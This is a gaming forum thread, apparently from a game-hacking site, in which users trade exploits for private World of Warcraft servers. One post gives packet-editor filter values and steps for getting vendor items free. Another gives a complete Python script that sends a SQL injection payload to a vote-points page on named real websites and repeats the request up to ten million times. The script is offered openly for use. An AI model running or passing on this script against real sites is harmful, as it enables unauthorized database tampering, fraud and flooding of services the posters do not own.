[WPE]buy anything for free menu

User Tag List

Results 1 to 14 of 14
  1. #1
    gatk0o's Avatar Member
    Reputation
    6
    Join Date
    Mar 2009
    Posts
    25
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    [WPE]buy anything for free

    Ok.So i know there is a firter to buying anything for free but i dont know if it works .Does someone know the filters numbers for Eternion wow cuz thers a vendors with some cool stuf i want to try buying from them.If someone knows that filter and still working I can give him the exploit for Vote Points . Ty

    [WPE]buy anything for free
  2. #2
    AlienCCL's Avatar Active Member
    Reputation
    28
    Join Date
    Aug 2008
    Posts
    444
    Thanks G/R
    0/1
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    omfg kids...

  3. #3
    !iMacroMage!'s Avatar Banned
    Reputation
    147
    Join Date
    Mar 2008
    Posts
    315
    Thanks G/R
    0/1
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    1. The exploit for vote points doesn't even work anymore.
    2. X_X If there is a filter such as this, I wanna know it :P

  4. #4
    Skippz1's Avatar Member
    Reputation
    6
    Join Date
    Mar 2009
    Posts
    20
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Filter is:
    Column 28
    Search 01
    Modify 00

    If your buying an item that costs gold just DRAG it into your backpack. DO NOT RIGHT CLICK THE ITEM TO BUY IT.

    If your buying an item that costs anything else like tokens. When you talk to the vendor CLOSE your backpack and drag the wanted item to the PICTURE of your backpack in the bottom-right.

    This exploit is fixed on most servers but still works on a few, try it.

  5. #5
    duddeeee's Avatar Member
    Reputation
    2
    Join Date
    Oct 2008
    Posts
    20
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    oohh xD is its still working? ill try it as soon as i get homee (Cant Waitt)

  6. #6
    unl3sh3d's Avatar Member
    Reputation
    9
    Join Date
    Dec 2008
    Posts
    29
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Phahaah this was actual at 1.8.0 version omg.

  7. #7
    Skippz1's Avatar Member
    Reputation
    6
    Join Date
    Mar 2009
    Posts
    20
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Still works on some 2.43 and 3.09 servers though.

  8. #8
    unl3sh3d's Avatar Member
    Reputation
    9
    Join Date
    Dec 2008
    Posts
    29
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by Skippz1 View Post
    Still works on some 2.43 and 3.09 servers though.
    Meh these servers must really sucks anyway what is the point to buy/has good items on server with 50 peoples online let say btw I don't know any server where this filter still work.

  9. #9
    AngshumanSSJV's Avatar Member
    Reputation
    65
    Join Date
    May 2008
    Posts
    519
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Gatkoo, you really made me disappointed! :x I guessed some new method has come out, but oh well......

    Everyone, stop posting EternionWoW/WoWAXA/AntWoW exploits/hacks.. cause the fking site n00bs i.e. Fuzzymini is here.

  10. #10
    gatk0o's Avatar Member
    Reputation
    6
    Join Date
    Mar 2009
    Posts
    25
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    a

    The vote exploit STILL works i can guarranttee. I ma de an acc with over 3k vote points in a minute i just fixed the sript given by you guys an IT WORKS !
    from socket import *
    from time import sleep

    port = 80
    #new way faster voting
    request_pt1 = "/getpoint.php?url=leet'+or+1='1+--&char=" #b sql inj condition = true
    request_pt2 = '&sn=1234809692227'

    print('[-]getpoint.php Vote Points Exploit By DarkInjection')
    print('[-]Usage Its Simple Just Give The Name To Add Some Points And Thats It')
    print('[-]Current Exploitable Realms :')
    print('\t*-->eternion-wow id[1]')
    print('\t*-->WoW-Wal id[2]')
    print('\t*-->wowolympc.com id[3]')
    name = raw_input('[*]Enter The Name To Vote Exploit: ')
    realm = raw_input('[*]Enter The Realm Id To Vote Exploit: ')
    if(len(name) > 0):
    print('[-]Name : '+name)
    else:
    print('gttk')
    exit(1)
    if(int(realm) == int(1)):
    target = 'www.antwow.com'
    if(int(realm) == int(2)):
    target = 'www.wowwal.com'
    if(int(realm) == int(3)):
    target = 'www.wowolympc.com'
    #basic browser request
    server_request ='GET '
    server_request +=request_pt1
    server_request +=name
    server_request +=request_pt2
    server_request +=' HTTP/1.1\r\n'
    server_request +='Host: '+target+'\r\n'
    server_request +='User-Agent: Mozilla/5.0\r\n'
    server_request +='Keep-Alive: 300\r\n'
    server_request +='Connection: Keep-Alive\r\n\r\n'
    #server_request +='Cookie: PHPSESSID=b98fd4a3e307a1f63c71d02cb5dfbfe3; TIMEA=1234809690; TYPEA=94.71.240.1901\r\n\r\n' we dont need the cookie
    #since **** up everything
    count = 10000000#times to send votes to take:P
    print('[*]Requesting The Server !')
    for i in range(0,int(count)):
    try:
    i = socket(AF_INET,SOCK_STREAM)
    except:
    print('[/]Error In SOcket Function')
    try:
    i.connect((target,int(port)))
    except:
    print('[/]Error In Connect()')
    try:
    i.send(server_request)
    print('[*]Request.....')
    print(i.recv(10000))
    except:
    print('[/]Error In Send()')

  11. #11
    gatk0o's Avatar Member
    Reputation
    6
    Join Date
    Mar 2009
    Posts
    25
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    a

    Thats the script it has taken many hours to think on it :P Enjoy

  12. #12
    AngshumanSSJV's Avatar Member
    Reputation
    65
    Join Date
    May 2008
    Posts
    519
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    You stole it from Kara....

    Everyone, stop posting EternionWoW/WoWAXA/AntWoW exploits/hacks.. cause the fking site n00bs i.e. Fuzzymini is here.

  13. #13
    visitor's Avatar Contributor
    Reputation
    174
    Join Date
    Mar 2008
    Posts
    307
    Thanks G/R
    16/15
    Trade Feedback
    1 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    if its true than I have gave him 2 reps for nothing
    Hey I just met you

  14. #14
    gatk0o's Avatar Member
    Reputation
    6
    Join Date
    Mar 2009
    Posts
    25
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I just wanted to help im not posting for rep

Similar Threads

  1. BUY ANYTHING free (Private's only)
    By Rickyat in forum World of Warcraft Bots and Programs
    Replies: 1
    Last Post: 05-14-2008, 02:12 AM
All times are GMT -5. The time now is 08:57 AM. Powered by vBulletin® Version 4.2.3
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved. User Alert System provided by Advanced User Tagging (Pro) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Google Authenticator verification provided by Two-Factor Authentication (Free) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Digital Point modules: Sphinx-based search